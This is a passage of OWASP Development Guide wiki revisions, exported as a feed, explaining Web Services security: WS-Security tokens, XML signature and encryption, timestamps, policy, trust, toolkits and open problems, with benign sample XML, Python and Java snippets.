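Note that the lookup scans for the wsu:Id attribute by its namespace-qualified name, without any knowledge of the message’s schema, which is exactly the advantage described above.&lt;br /&gt;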
&lt;br /&gt;
The WSS core specification also defines a general mechanism for referencing security tokens via the SecurityTokenReference element. An example of such an element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to practically any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of the specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier in this chapter, channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Enveloping or Enveloped signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
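The effect of canonicalization can be illustrated with Python’s standard library (xml.etree.ElementTree.canonicalize, available from Python 3.8, implements C14N 2.0 rather than the exact C14N/EXC-C14N transforms named above, but the principle is the same): two serializations that differ only in attribute order and empty-element syntax canonicalize to identical bytes, and therefore produce the identical digest that goes into dsig:DigestValue:&lt;br /&gt;

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

# Two semantically equivalent serializations of the same element
a = '<doc b="2" a="1"><child/></doc>'
b = '<doc a="1" b="2"><child></child></doc>'

# Canonicalization (attribute sorting, uniform empty-element form, etc.)
# produces byte-identical output for both serializations
ca, cb = ET.canonicalize(a), ET.canonicalize(b)
assert ca == cb

# ...so a SHA-1 digest over the canonical form matches as well
digest = base64.b64encode(hashlib.sha1(ca.encode("utf-8")).digest()).decode("ascii")
print(digest)
```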
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable to dereferencing a pointer to an object of a specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in “Referencing message parts” above), extended by token profiles to accommodate specific token types. A typical signature example is shown in the earlier sample in the “Security header’s structure” section.&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be prepended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. As with XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with an &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and prepended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in the “Security header’s structure” section.&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via the timestamp mechanism – each security header may contain just one such element, which states, in the UTC time format, the creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address the clock synchronization issue (which, as was already pointed out earlier, is generally not an issue in modern-day systems) – this has to be addressed out-of-band as far as the WSS mechanics are concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
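A receiver-side freshness check can be sketched as follows; the five-minute skew allowance is a hypothetical deployment parameter, not something mandated by the specification:&lt;br /&gt;

```python
from datetime import datetime, timedelta, timezone

def parse_utc(value):
    """Parse a wsu:Created / wsu:Expires value such as 2005-01-27T16:46:10Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def is_fresh(created, expires, now=None, skew=timedelta(minutes=5)):
    """Accept a header only inside its validity window, allowing a small clock skew."""
    now = now or datetime.now(timezone.utc)
    return parse_utc(created) - skew <= now <= parse_utc(expires) + skew

# Checking the sample timestamp against a moment inside its validity window
now = datetime(2005, 1, 27, 17, 0, 0, tzinfo=timezone.utc)
print(is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z", now=now))  # True
```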
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see “Types of tokens” above). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining a binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who they claim to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks it against the backend user store, or extracts the subject name from the X.509 certificate used for signing the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define the Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Service communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient detail to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection when constructing requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types; one of them, WS-SecurityPolicy, covers security.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via the trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, neither the WS-Policy nor the WS-Trust specification has been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it has been opened up to other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is the theory. In practice, there are a lot of obstacles hidden along the way, and one of the major ones is security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction: incompatible authentication and authorization models for users, the amount of trust between the services themselves and ways of establishing such trust, maintaining secure connections, and synchronizing user directories or otherwise exchanging users’ attributes. These issues are briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained for the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as the user population tends to change frequently across different domains. So, how does a service in domain B decide whether to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and that authentication tokens from one domain are acceptable in the other. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and only the fact that a user with a certain ID has successfully authenticated in another domain is conveyed, as would be the case with several large corporations that would like to form a partnership but are reluctant to share customer details. The decision to accept such a request is then based on inter-domain procedures, establishing special trust relationships and allowing the exchange of such opaque tokens, which is an example of Federation relationships. Of those efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most of the existing deployments are proof-of-concept or internal pilot projects rather than real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations that will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 is finally released. The next release of WSE, 3.0, is going to coincide with the VS.2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of the .NET Web Service tools frequently do not cleanly handle the WS-Security and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said, the WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security, and WS-Trust with WS-SecureConversation. The latter are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to the Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a number of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, in version 1.5 its support for the Web Service security specifications is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On the one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy – checking signatures, tokens, etc. – before passing them on to the target Web Service. When applied to outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements and to sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on back-end user and policy stores to view the credentials extracted from the WSS header from a broader perspective. An example of such a system is TransactionMinder from the former Netegrity – a Policy Enforcement Point for the Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold, and allow for real-time processing of huge documents decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come with a price, however – the performance and simplicity hold only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which presumably reduces risk through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing that results from pounding by thousands of developers working in the field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the existing back-end software infrastructure – at least, not without making performance sacrifices. Another consideration in deciding whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As can be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the technologies involved, especially since the errors that end users see most of the time have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with deployment-ready security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59463</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59463"/>
				<updated>2009-04-26T11:35:05Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Access control */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address them. Due to space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and to warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some herald Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, seeing them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw: let’s assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable effort to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on a server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers in log files (where it can be browsed by anybody) and local caches aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make conscious trade-offs at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
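The encoding step just described can be sketched in a few lines of Java using the JDK’s built-in Base64 codec (the class and method names below are illustrative, not from any WS toolkit):&lt;br /&gt;

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Illustrative helper: making binary token bytes (e.g. a DER-encoded
// X.509 certificate) XML-safe with Base64 before embedding them in a
// SOAP header, and restoring them unambiguously on the receiving side.
public class TokenEncoding {

    // Encode raw token bytes into a text form safe to place in XML.
    public static String encodeToken(byte[] rawToken) {
        return Base64.getEncoder().encodeToString(rawToken);
    }

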